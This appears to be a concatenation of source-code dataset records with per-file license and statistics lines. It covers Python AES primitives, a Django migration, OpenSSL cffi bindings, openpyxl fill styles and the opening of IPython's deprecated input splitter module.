0xd0,0x2c,0x1e,0x8f,0xca,0x3f,0x0f,0x02,
0xc1,0xaf,0xbd,0x03,0x01,0x13,0x8a,0x6b,
0x3a,0x91,0x11,0x41,0x4f,0x67,0xdc,0xea,
0x97,0xf2,0xcf,0xce,0xf0,0xb4,0xe6,0x73,
0x96,0xac,0x74,0x22,0xe7,0xad,0x35,0x85,
0xe2,0xf9,0x37,0xe8,0x1c,0x75,0xdf,0x6e,
0x47,0xf1,0x1a,0x71,0x1d,0x29,0xc5,0x89,
0x6f,0xb7,0x62,0x0e,0xaa,0x18,0xbe,0x1b,
0xfc,0x56,0x3e,0x4b,0xc6,0xd2,0x79,0x20,
0x9a,0xdb,0xc0,0xfe,0x78,0xcd,0x5a,0xf4,
0x1f,0xdd,0xa8,0x33,0x88,0x07,0xc7,0x31,
0xb1,0x12,0x10,0x59,0x27,0x80,0xec,0x5f,
0x60,0x51,0x7f,0xa9,0x19,0xb5,0x4a,0x0d,
0x2d,0xe5,0x7a,0x9f,0x93,0xc9,0x9c,0xef,
0xa0,0xe0,0x3b,0x4d,0xae,0x2a,0xf5,0xb0,
0xc8,0xeb,0xbb,0x3c,0x83,0x53,0x99,0x61,
0x17,0x2b,0x04,0x7e,0xba,0x77,0xd6,0x26,
0xe1,0x69,0x14,0x63,0x55,0x21,0x0c,0x7d)
#-------------------------------------
""" For each block size (Nb), the ShiftRow operation shifts row i
by the amount Ci. Note that row 0 is not shifted.
Nb C1 C2 C3
------------------- """
shiftOffset = { 4 : ( 0, 1, 2, 3),
5 : ( 0, 1, 2, 3),
6 : ( 0, 1, 2, 3),
7 : ( 0, 1, 2, 4),
8 : ( 0, 1, 3, 4) }
def ShiftRows(algInstance):
tmp = [0]*algInstance.Nb # list of size Nb
for r in range(1,4): # row 0 reamains unchanged and can be skipped
for c in range(algInstance.Nb):
tmp[c] = algInstance.state[(c+shiftOffset[algInstance.Nb][r]) % algInstance.Nb][r]
for c in range(algInstance.Nb):
algInstance.state[c][r] = tmp[c]
def InvShiftRows(algInstance):
tmp = [0]*algInstance.Nb # list of size Nb
for r in range(1,4): # row 0 reamains unchanged and can be skipped
for c in range(algInstance.Nb):
tmp[c] = algInstance.state[(c+algInstance.Nb-shiftOffset[algInstance.Nb][r]) % algInstance.Nb][r]
for c in range(algInstance.Nb):
algInstance.state[c][r] = tmp[c]
#-------------------------------------
def MixColumns(a):
Sprime = [0,0,0,0]
for j in range(a.Nb): # for each column
Sprime[0] = mul(2,a.state[j][0])^mul(3,a.state[j][1])^mul(1,a.state[j][2])^mul(1,a.state[j][3])
Sprime[1] = mul(1,a.state[j][0])^mul(2,a.state[j][1])^mul(3,a.state[j][2])^mul(1,a.state[j][3])
Sprime[2] = mul(1,a.state[j][0])^mul(1,a.state[j][1])^mul(2,a.state[j][2])^mul(3,a.state[j][3])
Sprime[3] = mul(3,a.state[j][0])^mul(1,a.state[j][1])^mul(1,a.state[j][2])^mul(2,a.state[j][3])
for i in range(4):
a.state[j][i] = Sprime[i]
def InvMixColumns(a):
""" Mix the four bytes of every column in a linear way
This is the opposite operation of Mixcolumn """
Sprime = [0,0,0,0]
for j in range(a.Nb): # for each column
Sprime[0] = mul(0x0E,a.state[j][0])^mul(0x0B,a.state[j][1])^mul(0x0D,a.state[j][2])^mul(0x09,a.state[j][3])
Sprime[1] = mul(0x09,a.state[j][0])^mul(0x0E,a.state[j][1])^mul(0x0B,a.state[j][2])^mul(0x0D,a.state[j][3])
Sprime[2] = mul(0x0D,a.state[j][0])^mul(0x09,a.state[j][1])^mul(0x0E,a.state[j][2])^mul(0x0B,a.state[j][3])
Sprime[3] = mul(0x0B,a.state[j][0])^mul(0x0D,a.state[j][1])^mul(0x09,a.state[j][2])^mul(0x0E,a.state[j][3])
for i in range(4):
a.state[j][i] = Sprime[i]
#-------------------------------------
def mul(a, b):
""" Multiply two elements of GF(2^m)
needed for MixColumn and InvMixColumn """
if (a !=0 and b!=0):
return Alogtable[(Logtable[a] + Logtable[b])%255]
else:
return 0
Logtable = ( 0, 0, 25, 1, 50, 2, 26, 198, 75, 199, 27, 104, 51, 238, 223, 3,
100, 4, 224, 14, 52, 141, 129, 239, 76, 113, 8, 200, 248, 105, 28, 193,
125, 194, 29, 181, 249, 185, 39, 106, 77, 228, 166, 114, 154, 201, 9, 120,
101, 47, 138, 5, 33, 15, 225, 36, 18, 240, 130, 69, 53, 147, 218, 142,
150, 143, 219, 189, 54, 208, 206, 148, 19, 92, 210, 241, 64, 70, 131, 56,
102, 221, 253, 48, 191, 6, 139, 98, 179, 37, 226, 152, 34, 136, 145, 16,
126, 110, 72, 195, 163, 182, 30, 66, 58, 107, 40, 84, 250, 133, 61, 186,
43, 121, 10, 21, 155, 159, 94, 202, 78, 212, 172, 229, 243, 115, 167, 87,
175, 88, 168, 80, 244, 234, 214, 116, 79, 174, 233, 213, 231, 230, 173, 232,
44, 215, 117, 122, 235, 22, 11, 245, 89, 203, 95, 176, 156, 169, 81, 160,
127, 12, 246, 111, 23, 196, 73, 236, 216, 67, 31, 45, 164, 118, 123, 183,
204, 187, 62, 90, 251, 96, 177, 134, 59, 82, 161, 108, 170, 85, 41, 157,
151, 178, 135, 144, 97, 190, 220, 252, 188, 149, 207, 205, 55, 63, 91, 209,
83, 57, 132, 60, 65, 162, 109, 71, 20, 42, 158, 93, 86, 242, 211, 171,
68, 17, 146, 217, 35, 32, 46, 137, 180, 124, 184, 38, 119, 153, 227, 165,
103, 74, 237, 222, 197, 49, 254, 24, 13, 99, 140, 128, 192, 247, 112, 7)
Alogtable= ( 1, 3, 5, 15, 17, 51, 85, 255, 26, 46, 114, 150, 161, 248, 19, 53,
95, 225, 56, 72, 216, 115, 149, 164, 247, 2, 6, 10, 30, 34, 102, 170,
229, 52, 92, 228, 55, 89, 235, 38, 106, 190, 217, 112, 144, 171, 230, 49,
83, 245, 4, 12, 20, 60, 68, 204, 79, 209, 104, 184, 211, 110, 178, 205,
76, 212, 103, 169, 224, 59, 77, 215, 98, 166, 241, 8, 24, 40, 120, 136,
131, 158, 185, 208, 107, 189, 220, 127, 129, 152, 179, 206, 73, 219, 118, 154,
181, 196, 87, 249, 16, 48, 80, 240, 11, 29, 39, 105, 187, 214, 97, 163,
254, 25, 43, 125, 135, 146, 173, 236, 47, 113, 147, 174, 233, 32, 96, 160,
251, 22, 58, 78, 210, 109, 183, 194, 93, 231, 50, 86, 250, 21, 63, 65,
195, 94, 226, 61, 71, 201, 64, 192, 91, 237, 44, 116, 156, 191, 218, 117,
159, 186, 213, 100, 172, 239, 42, 126, 130, 157, 188, 223, 122, 142, 137, 128,
155, 182, 193, 88, 232, 35, 101, 175, 234, 37, 111, 177, 200, 67, 197, 84,
252, 31, 33, 99, 165, 244, 7, 9, 27, 45, 119, 153, 176, 203, 70, 202,
69, 207, 74, 222, 121, 139, 134, 145, 168, 227, 62, 66, 198, 81, 243, 14,
18, 54, 90, 238, 41, 123, 141, 140, 143, 138, 133, 148, 167, 242, 13, 23,
57, 75, 221, 124, 132, 151, 162, 253, 28, 36, 108, 180, 199, 82, 246, 1)
|
mit
| 4,782,612,339,069,262,000
| 49.927336
| 115
| 0.547901
| false
| 2.290383
| false
| false
| false
|
Ninad998/FinalYearProject
|
deep_stylo/migrations/0001_initial.py
|
1
|
1563
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-24 16:30
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Result',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('doc_id', models.IntegerField()),
('authorList', models.CharField(max_length=200)),
('predicted_author', models.CharField(max_length=200, null=True)),
('train_accuracy', models.DecimalField(decimal_places=10, max_digits=11, null=True)),
('validation_accuracy', models.DecimalField(decimal_places=10, max_digits=11, null=True)),
('test_accuracy', models.DecimalField(decimal_places=10, max_digits=11, null=True)),
('test_binary', models.DecimalField(decimal_places=1, max_digits=2, null=True)),
('upload_date', models.DateTimeField(default=django.utils.timezone.now)),
('status', models.DecimalField(decimal_places=1, default=0.0, max_digits=2)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
mit
| -7,605,435,888,718,739,000
| 42.416667
| 118
| 0.627639
| false
| 4.070313
| false
| false
| false
|
Ayrx/cryptography
|
src/_cffi_src/openssl/crypto.py
|
1
|
3371
|
# This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
INCLUDES = """
#include <openssl/crypto.h>
"""
TYPES = """
static const long Cryptography_HAS_LOCKING_CALLBACKS;
static const int SSLEAY_VERSION;
static const int SSLEAY_CFLAGS;
static const int SSLEAY_PLATFORM;
static const int SSLEAY_DIR;
static const int SSLEAY_BUILT_ON;
static const int OPENSSL_VERSION;
static const int OPENSSL_CFLAGS;
static const int OPENSSL_BUILT_ON;
static const int OPENSSL_PLATFORM;
static const int OPENSSL_DIR;
static const int CRYPTO_MEM_CHECK_ON;
static const int CRYPTO_MEM_CHECK_OFF;
static const int CRYPTO_MEM_CHECK_ENABLE;
static const int CRYPTO_MEM_CHECK_DISABLE;
static const int CRYPTO_LOCK;
static const int CRYPTO_UNLOCK;
static const int CRYPTO_READ;
static const int CRYPTO_LOCK_SSL;
"""
FUNCTIONS = """
int CRYPTO_mem_ctrl(int);
int CRYPTO_is_mem_check_on(void);
void CRYPTO_mem_leaks(struct bio_st *);
"""
MACROS = """
/* CRYPTO_cleanup_all_ex_data became a macro in 1.1.0 */
void CRYPTO_cleanup_all_ex_data(void);
/* as of 1.1.0 OpenSSL does its own locking *angelic chorus*. These functions
have become macros that are no ops */
int CRYPTO_num_locks(void);
void CRYPTO_set_locking_callback(void(*)(int, int, const char *, int));
void (*CRYPTO_get_locking_callback(void))(int, int, const char *, int);
/* SSLeay was removed in 1.1.0 */
unsigned long SSLeay(void);
const char *SSLeay_version(int);
/* these functions were added to replace the SSLeay functions in 1.1.0 */
unsigned long OpenSSL_version_num(void);
const char *OpenSSL_version(int);
/* this is a macro in 1.1.0 */
void OPENSSL_free(void *);
/* This was removed in 1.1.0 */
void CRYPTO_lock(int, int, const char *, int);
"""
CUSTOMIZATIONS = """
/* In 1.1.0 SSLeay has finally been retired. We bidirectionally define the
values so you can use either one. This is so we can use the new function
names no matter what OpenSSL we're running on, but users on older pyOpenSSL
releases won't see issues if they're running OpenSSL 1.1.0 */
#if !defined(SSLEAY_VERSION)
# define SSLeay OpenSSL_version_num
# define SSLeay_version OpenSSL_version
# define SSLEAY_VERSION_NUMBER OPENSSL_VERSION_NUMBER
# define SSLEAY_VERSION OPENSSL_VERSION
# define SSLEAY_CFLAGS OPENSSL_CFLAGS
# define SSLEAY_BUILT_ON OPENSSL_BUILT_ON
# define SSLEAY_PLATFORM OPENSSL_PLATFORM
# define SSLEAY_DIR OPENSSL_DIR
#endif
#if !defined(OPENSSL_VERSION)
# define OpenSSL_version_num SSLeay
# define OpenSSL_version SSLeay_version
# define OPENSSL_VERSION SSLEAY_VERSION
# define OPENSSL_CFLAGS SSLEAY_CFLAGS
# define OPENSSL_BUILT_ON SSLEAY_BUILT_ON
# define OPENSSL_PLATFORM SSLEAY_PLATFORM
# define OPENSSL_DIR SSLEAY_DIR
#endif
#if !defined(CRYPTO_LOCK)
static const long Cryptography_HAS_LOCKING_CALLBACKS = 0;
static const long CRYPTO_LOCK = 0;
static const long CRYPTO_UNLOCK = 0;
static const long CRYPTO_READ = 0;
static const long CRYPTO_LOCK_SSL = 0;
void (*CRYPTO_lock)(int, int, const char *, int) = NULL;
#else
static const long Cryptography_HAS_LOCKING_CALLBACKS = 1;
#endif
"""
|
bsd-3-clause
| 7,430,546,441,362,209,000
| 33.397959
| 79
| 0.723821
| false
| 3.092661
| false
| false
| false
|
mfsteen/CIQTranslate-Kristian
|
openpyxl/styles/fills.py
|
1
|
5258
|
from __future__ import absolute_import
# Copyright (c) 2010-2016 openpyxl
from openpyxl.descriptors import Float, Set, Alias, NoneSet
from openpyxl.descriptors.sequence import ValueSequence
from openpyxl.compat import safe_string
from .colors import ColorDescriptor, Color
from .hashable import HashableObject
from openpyxl.xml.functions import Element, localname, safe_iterator
from openpyxl.xml.constants import SHEET_MAIN_NS
FILL_NONE = 'none'
FILL_SOLID = 'solid'
FILL_PATTERN_DARKDOWN = 'darkDown'
FILL_PATTERN_DARKGRAY = 'darkGray'
FILL_PATTERN_DARKGRID = 'darkGrid'
FILL_PATTERN_DARKHORIZONTAL = 'darkHorizontal'
FILL_PATTERN_DARKTRELLIS = 'darkTrellis'
FILL_PATTERN_DARKUP = 'darkUp'
FILL_PATTERN_DARKVERTICAL = 'darkVertical'
FILL_PATTERN_GRAY0625 = 'gray0625'
FILL_PATTERN_GRAY125 = 'gray125'
FILL_PATTERN_LIGHTDOWN = 'lightDown'
FILL_PATTERN_LIGHTGRAY = 'lightGray'
FILL_PATTERN_LIGHTGRID = 'lightGrid'
FILL_PATTERN_LIGHTHORIZONTAL = 'lightHorizontal'
FILL_PATTERN_LIGHTTRELLIS = 'lightTrellis'
FILL_PATTERN_LIGHTUP = 'lightUp'
FILL_PATTERN_LIGHTVERTICAL = 'lightVertical'
FILL_PATTERN_MEDIUMGRAY = 'mediumGray'
fills = (FILL_SOLID, FILL_PATTERN_DARKDOWN, FILL_PATTERN_DARKGRAY,
FILL_PATTERN_DARKGRID, FILL_PATTERN_DARKHORIZONTAL, FILL_PATTERN_DARKTRELLIS,
FILL_PATTERN_DARKUP, FILL_PATTERN_DARKVERTICAL, FILL_PATTERN_GRAY0625,
FILL_PATTERN_GRAY125, FILL_PATTERN_LIGHTDOWN, FILL_PATTERN_LIGHTGRAY,
FILL_PATTERN_LIGHTGRID, FILL_PATTERN_LIGHTHORIZONTAL,
FILL_PATTERN_LIGHTTRELLIS, FILL_PATTERN_LIGHTUP, FILL_PATTERN_LIGHTVERTICAL,
FILL_PATTERN_MEDIUMGRAY)
class Fill(HashableObject):
"""Base class"""
tagname = "fill"
@classmethod
def from_tree(cls, el):
children = [c for c in el]
if not children:
return
child = children[0]
if "patternFill" in child.tag:
return PatternFill._from_tree(child)
else:
return GradientFill._from_tree(child)
class PatternFill(Fill):
"""Area fill patterns for use in styles.
Caution: if you do not specify a fill_type, other attributes will have
no effect !"""
tagname = "patternFill"
__fields__ = ('patternType',
'fgColor',
'bgColor')
__elements__ = ('fgColor', 'bgColor')
patternType = NoneSet(values=fills)
fill_type = Alias("patternType")
fgColor = ColorDescriptor()
start_color = Alias("fgColor")
bgColor = ColorDescriptor()
end_color = Alias("bgColor")
def __init__(self, patternType=None, fgColor=Color(), bgColor=Color(),
fill_type=None, start_color=None, end_color=None):
if fill_type is not None:
patternType = fill_type
self.patternType = patternType
if start_color is not None:
fgColor = start_color
self.fgColor = fgColor
if end_color is not None:
bgColor = end_color
self.bgColor = bgColor
@classmethod
def _from_tree(cls, el):
attrib = dict(el.attrib)
for child in el:
desc = localname(child)
attrib[desc] = Color.from_tree(child)
return cls(**attrib)
def to_tree(self, tagname=None):
parent = Element("fill")
el = Element(self.tagname)
if self.patternType is not None:
el.set('patternType', self.patternType)
for c in self.__elements__:
value = getattr(self, c)
if value != Color():
el.append(value.to_tree(c))
parent.append(el)
return parent
DEFAULT_EMPTY_FILL = PatternFill()
DEFAULT_GRAY_FILL = PatternFill(patternType='gray125')
def _serialise_stop(tagname, sequence, namespace=None):
for idx, color in enumerate(sequence):
stop = Element("stop", position=str(idx))
stop.append(color.to_tree())
yield stop
class GradientFill(Fill):
tagname = "gradientFill"
__fields__ = ('type', 'degree', 'left', 'right', 'top', 'bottom', 'stop')
type = Set(values=('linear', 'path'))
fill_type = Alias("type")
degree = Float()
left = Float()
right = Float()
top = Float()
bottom = Float()
stop = ValueSequence(expected_type=Color, to_tree=_serialise_stop)
def __init__(self, type="linear", degree=0, left=0, right=0, top=0,
bottom=0, stop=(), fill_type=None):
self.degree = degree
self.left = left
self.right = right
self.top = top
self.bottom = bottom
self.stop = stop
if fill_type is not None:
type = fill_type
self.type = type
def __iter__(self):
for attr in self.__attrs__:
value = getattr(self, attr)
if value:
yield attr, safe_string(value)
@classmethod
def _from_tree(cls, node):
colors = []
for color in safe_iterator(node, "{%s}color" % SHEET_MAIN_NS):
colors.append(Color.from_tree(color))
return cls(stop=colors, **node.attrib)
def to_tree(self, tagname=None, namespace=None):
parent = Element("fill")
el = super(GradientFill, self).to_tree()
parent.append(el)
return parent
|
gpl-3.0
| -6,165,026,717,945,432,000
| 29.218391
| 86
| 0.63294
| false
| 3.500666
| false
| false
| false
|
sserrot/champion_relationships
|
venv/Lib/site-packages/IPython/core/inputsplitter.py
|
1
|
28155
|
"""DEPRECATED: Input handling and transformation machinery.
This module was deprecated in IPython 7.0, in favour of inputtransformer2.
The first class in this module, :class:`InputSplitter`, is designed to tell when
input from a line-oriented frontend is complete and should be executed, and when
the user should be prompted for another line of code instead. The name 'input
splitter' is largely for historical reasons.
A companion, :class:`IPythonInputSplitter`, provides the same functionality but
with full support for the extended IPython syntax (magics, system calls, etc).
The code to actually do these transformations is in :mod:`IPython.core.inputtransformer`.
:class:`IPythonInputSplitter` feeds the raw code to the transformers in order
and stores the results.
For more details, see the class docstrings below.
"""
from warnings import warn
warn('IPython.core.inputsplitter is deprecated since IPython 7 in favor of `IPython.core.inputtransformer2`',
DeprecationWarning)
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
import ast
import codeop
import io
import re
import sys
import tokenize
import warnings
from IPython.core.inputtransformer import (leading_indent,
classic_prompt,
ipy_prompt,
cellmagic,
assemble_logical_lines,
help_end,
escaped_commands,
assign_from_magic,
assign_from_system,
assemble_python_lines,
)
# These are available in this module for backwards compatibility.
from IPython.core.inputtransformer import (ESC_SHELL, ESC_SH_CAP, ESC_HELP,
ESC_HELP2, ESC_MAGIC, ESC_MAGIC2,
ESC_QUOTE, ESC_QUOTE2, ESC_PAREN, ESC_SEQUENCES)
#-----------------------------------------------------------------------------
# Utilities
#-----------------------------------------------------------------------------
# FIXME: These are general-purpose utilities that later can be moved to the
# general ward. Kept here for now because we're being very strict about test
# coverage with this code, and this lets us ensure that we keep 100% coverage
# while developing.
# compiled regexps for autoindent management
dedent_re = re.compile('|'.join([
r'^\s+raise(\s.*)?$', # raise statement (+ space + other stuff, maybe)
r'^\s+raise\([^\)]*\).*$', # wacky raise with immediate open paren
r'^\s+return(\s.*)?$', # normal return (+ space + other stuff, maybe)
r'^\s+return\([^\)]*\).*$', # wacky return with immediate open paren
r'^\s+pass\s*$', # pass (optionally followed by trailing spaces)
r'^\s+break\s*$', # break (optionally followed by trailing spaces)
r'^\s+continue\s*$', # continue (optionally followed by trailing spaces)
]))
ini_spaces_re = re.compile(r'^([ \t\r\f\v]+)')
# regexp to match pure comment lines so we don't accidentally insert 'if 1:'
# before pure comments
comment_line_re = re.compile(r'^\s*\#')
def num_ini_spaces(s):
"""Return the number of initial spaces in a string.
Note that tabs are counted as a single space. For now, we do *not* support
mixing of tabs and spaces in the user's input.
Parameters
----------
s : string
Returns
-------
n : int
"""
ini_spaces = ini_spaces_re.match(s)
if ini_spaces:
return ini_spaces.end()
else:
return 0
# Fake token types for partial_tokenize:
INCOMPLETE_STRING = tokenize.N_TOKENS
IN_MULTILINE_STATEMENT = tokenize.N_TOKENS + 1
# The 2 classes below have the same API as TokenInfo, but don't try to look up
# a token type name that they won't find.
class IncompleteString:
type = exact_type = INCOMPLETE_STRING
def __init__(self, s, start, end, line):
self.s = s
self.start = start
self.end = end
self.line = line
class InMultilineStatement:
type = exact_type = IN_MULTILINE_STATEMENT
def __init__(self, pos, line):
self.s = ''
self.start = self.end = pos
self.line = line
def partial_tokens(s):
"""Iterate over tokens from a possibly-incomplete string of code.
This adds two special token types: INCOMPLETE_STRING and
IN_MULTILINE_STATEMENT. These can only occur as the last token yielded, and
represent the two main ways for code to be incomplete.
"""
readline = io.StringIO(s).readline
token = tokenize.TokenInfo(tokenize.NEWLINE, '', (1, 0), (1, 0), '')
try:
for token in tokenize.generate_tokens(readline):
yield token
except tokenize.TokenError as e:
# catch EOF error
lines = s.splitlines(keepends=True)
end = len(lines), len(lines[-1])
if 'multi-line string' in e.args[0]:
l, c = start = token.end
s = lines[l-1][c:] + ''.join(lines[l:])
yield IncompleteString(s, start, end, lines[-1])
elif 'multi-line statement' in e.args[0]:
yield InMultilineStatement(end, lines[-1])
else:
raise
def find_next_indent(code):
"""Find the number of spaces for the next line of indentation"""
tokens = list(partial_tokens(code))
if tokens[-1].type == tokenize.ENDMARKER:
tokens.pop()
if not tokens:
return 0
while (tokens[-1].type in {tokenize.DEDENT, tokenize.NEWLINE, tokenize.COMMENT}):
tokens.pop()
if tokens[-1].type == INCOMPLETE_STRING:
# Inside a multiline string
return 0
# Find the indents used before
prev_indents = [0]
def _add_indent(n):
if n != prev_indents[-1]:
prev_indents.append(n)
tokiter = iter(tokens)
for tok in tokiter:
if tok.type in {tokenize.INDENT, tokenize.DEDENT}:
_add_indent(tok.end[1])
elif (tok.type == tokenize.NL):
try:
_add_indent(next(tokiter).start[1])
except StopIteration:
break
last_indent = prev_indents.pop()
# If we've just opened a multiline statement (e.g. 'a = ['), indent more
if tokens[-1].type == IN_MULTILINE_STATEMENT:
if tokens[-2].exact_type in {tokenize.LPAR, tokenize.LSQB, tokenize.LBRACE}:
return last_indent + 4
return last_indent
if tokens[-1].exact_type == tokenize.COLON:
# Line ends with colon - indent
return last_indent + 4
if last_indent:
# Examine the last line for dedent cues - statements like return or
# raise which normally end a block of code.
last_line_starts = 0
for i, tok in enumerate(tokens):
if tok.type == tokenize.NEWLINE:
last_line_starts = i + 1
last_line_tokens = tokens[last_line_starts:]
names = [t.string for t in last_line_tokens if t.type == tokenize.NAME]
if names and names[0] in {'raise', 'return', 'pass', 'break', 'continue'}:
# Find the most recent indentation less than the current level
for indent in reversed(prev_indents):
if indent < last_indent:
return indent
return last_indent
def last_blank(src):
"""Determine if the input source ends in a blank.
A blank is either a newline or a line consisting of whitespace.
Parameters
----------
src : string
A single or multiline string.
"""
if not src: return False
ll = src.splitlines()[-1]
return (ll == '') or ll.isspace()
last_two_blanks_re = re.compile(r'\n\s*\n\s*$', re.MULTILINE)
last_two_blanks_re2 = re.compile(r'.+\n\s*\n\s+$', re.MULTILINE)
def last_two_blanks(src):
"""Determine if the input source ends in two blanks.
A blank is either a newline or a line consisting of whitespace.
Parameters
----------
src : string
A single or multiline string.
"""
if not src: return False
# The logic here is tricky: I couldn't get a regexp to work and pass all
# the tests, so I took a different approach: split the source by lines,
# grab the last two and prepend '###\n' as a stand-in for whatever was in
# the body before the last two lines. Then, with that structure, it's
# possible to analyze with two regexps. Not the most elegant solution, but
# it works. If anyone tries to change this logic, make sure to validate
# the whole test suite first!
new_src = '\n'.join(['###\n'] + src.splitlines()[-2:])
return (bool(last_two_blanks_re.match(new_src)) or
bool(last_two_blanks_re2.match(new_src)) )
def remove_comments(src):
"""Remove all comments from input source.
Note: comments are NOT recognized inside of strings!
Parameters
----------
src : string
A single or multiline input string.
Returns
-------
String with all Python comments removed.
"""
return re.sub('#.*', '', src)
def get_input_encoding():
"""Return the default standard input encoding.
If sys.stdin has no encoding, 'ascii' is returned."""
# There are strange environments for which sys.stdin.encoding is None. We
# ensure that a valid encoding is returned.
encoding = getattr(sys.stdin, 'encoding', None)
if encoding is None:
encoding = 'ascii'
return encoding
#-----------------------------------------------------------------------------
# Classes and functions for normal Python syntax handling
#-----------------------------------------------------------------------------
class InputSplitter(object):
r"""An object that can accumulate lines of Python source before execution.
This object is designed to be fed python source line-by-line, using
:meth:`push`. It will return on each push whether the currently pushed
code could be executed already. In addition, it provides a method called
:meth:`push_accepts_more` that can be used to query whether more input
can be pushed into a single interactive block.
This is a simple example of how an interactive terminal-based client can use
this tool::
isp = InputSplitter()
while isp.push_accepts_more():
indent = ' '*isp.indent_spaces
prompt = '>>> ' + indent
line = indent + raw_input(prompt)
isp.push(line)
print 'Input source was:\n', isp.source_reset(),
"""
# A cache for storing the current indentation
# The first value stores the most recently processed source input
# The second value is the number of spaces for the current indentation
# If self.source matches the first value, the second value is a valid
# current indentation. Otherwise, the cache is invalid and the indentation
# must be recalculated.
_indent_spaces_cache = None, None
# String, indicating the default input encoding. It is computed by default
# at initialization time via get_input_encoding(), but it can be reset by a
# client with specific knowledge of the encoding.
encoding = ''
# String where the current full source input is stored, properly encoded.
# Reading this attribute is the normal way of querying the currently pushed
# source code, that has been properly encoded.
source = ''
# Code object corresponding to the current source. It is automatically
# synced to the source, so it can be queried at any time to obtain the code
# object; it will be None if the source doesn't compile to valid Python.
code = None
# Private attributes
# List with lines of input accumulated so far
_buffer = None
# Command compiler
_compile = None
# Boolean indicating whether the current block is complete
_is_complete = None
# Boolean indicating whether the current block has an unrecoverable syntax error
_is_invalid = False
def __init__(self):
"""Create a new InputSplitter instance.
"""
self._buffer = []
self._compile = codeop.CommandCompiler()
self.encoding = get_input_encoding()
def reset(self):
"""Reset the input buffer and associated state."""
self._buffer[:] = []
self.source = ''
self.code = None
self._is_complete = False
self._is_invalid = False
def source_reset(self):
"""Return the input source and perform a full reset.
"""
out = self.source
self.reset()
return out
def check_complete(self, source):
"""Return whether a block of code is ready to execute, or should be continued
This is a non-stateful API, and will reset the state of this InputSplitter.
Parameters
----------
source : string
Python input code, which can be multiline.
Returns
-------
status : str
One of 'complete', 'incomplete', or 'invalid' if source is not a
prefix of valid code.
indent_spaces : int or None
The number of spaces by which to indent the next line of code. If
status is not 'incomplete', this is None.
"""
self.reset()
try:
self.push(source)
except SyntaxError:
# Transformers in IPythonInputSplitter can raise SyntaxError,
# which push() will not catch.
return 'invalid', None
else:
if self._is_invalid:
return 'invalid', None
elif self.push_accepts_more():
return 'incomplete', self.get_indent_spaces()
else:
return 'complete', None
finally:
self.reset()
def push(self, lines:str) -> bool:
"""Push one or more lines of input.
This stores the given lines and returns a status code indicating
whether the code forms a complete Python block or not.
Any exceptions generated in compilation are swallowed, but if an
exception was produced, the method returns True.
Parameters
----------
lines : string
One or more lines of Python input.
Returns
-------
is_complete : boolean
True if the current input source (the result of the current input
plus prior inputs) forms a complete Python execution block. Note that
this value is also stored as a private attribute (``_is_complete``), so it
can be queried at any time.
"""
assert isinstance(lines, str)
self._store(lines)
source = self.source
# Before calling _compile(), reset the code object to None so that if an
# exception is raised in compilation, we don't mislead by having
# inconsistent code/source attributes.
self.code, self._is_complete = None, None
self._is_invalid = False
# Honor termination lines properly
if source.endswith('\\\n'):
return False
try:
with warnings.catch_warnings():
warnings.simplefilter('error', SyntaxWarning)
self.code = self._compile(source, symbol="exec")
# Invalid syntax can produce any of a number of different errors from
# inside the compiler, so we have to catch them all. Syntax errors
# immediately produce a 'ready' block, so the invalid Python can be
# sent to the kernel for evaluation with possible ipython
# special-syntax conversion.
except (SyntaxError, OverflowError, ValueError, TypeError,
MemoryError, SyntaxWarning):
self._is_complete = True
self._is_invalid = True
else:
# Compilation didn't produce any exceptions (though it may not have
# given a complete code object)
self._is_complete = self.code is not None
return self._is_complete
def push_accepts_more(self):
"""Return whether a block of interactive input can accept more input.
This method is meant to be used by line-oriented frontends, who need to
guess whether a block is complete or not based solely on prior and
current input lines. The InputSplitter considers it has a complete
interactive block and will not accept more input when either:
* A SyntaxError is raised
* The code is complete and consists of a single line or a single
non-compound statement
* The code is complete and has a blank line at the end
If the current input produces a syntax error, this method immediately
returns False but does *not* raise the syntax error exception, as
typically clients will want to send invalid syntax to an execution
backend which might convert the invalid syntax into valid Python via
one of the dynamic IPython mechanisms.
"""
# With incomplete input, unconditionally accept more
# A syntax error also sets _is_complete to True - see push()
if not self._is_complete:
#print("Not complete") # debug
return True
# The user can make any (complete) input execute by leaving a blank line
last_line = self.source.splitlines()[-1]
if (not last_line) or last_line.isspace():
#print("Blank line") # debug
return False
# If there's just a single line or AST node, and we're flush left, as is
# the case after a simple statement such as 'a=1', we want to execute it
# straight away.
if self.get_indent_spaces() == 0:
if len(self.source.splitlines()) <= 1:
return False
try:
code_ast = ast.parse(u''.join(self._buffer))
except Exception:
#print("Can't parse AST") # debug
return False
else:
if len(code_ast.body) == 1 and \
not hasattr(code_ast.body[0], 'body'):
#print("Simple statement") # debug
return False
# General fallback - accept more code
return True
def get_indent_spaces(self):
sourcefor, n = self._indent_spaces_cache
if sourcefor == self.source:
return n
# self.source always has a trailing newline
n = find_next_indent(self.source[:-1])
self._indent_spaces_cache = (self.source, n)
return n
# Backwards compatibility. I think all code that used .indent_spaces was
# inside IPython, but we can leave this here until IPython 7 in case any
# other modules are using it. -TK, November 2017
indent_spaces = property(get_indent_spaces)
def _store(self, lines, buffer=None, store='source'):
"""Store one or more lines of input.
If input lines are not newline-terminated, a newline is automatically
appended."""
if buffer is None:
buffer = self._buffer
if lines.endswith('\n'):
buffer.append(lines)
else:
buffer.append(lines+'\n')
setattr(self, store, self._set_source(buffer))
def _set_source(self, buffer):
return u''.join(buffer)
class IPythonInputSplitter(InputSplitter):
"""An input splitter that recognizes all of IPython's special syntax."""
# String with raw, untransformed input.
source_raw = ''
# Flag to track when a transformer has stored input that it hasn't given
# back yet.
transformer_accumulating = False
# Flag to track when assemble_python_lines has stored input that it hasn't
# given back yet.
within_python_line = False
# Private attributes
# List with lines of raw input accumulated so far.
_buffer_raw = None
def __init__(self, line_input_checker=True, physical_line_transforms=None,
logical_line_transforms=None, python_line_transforms=None):
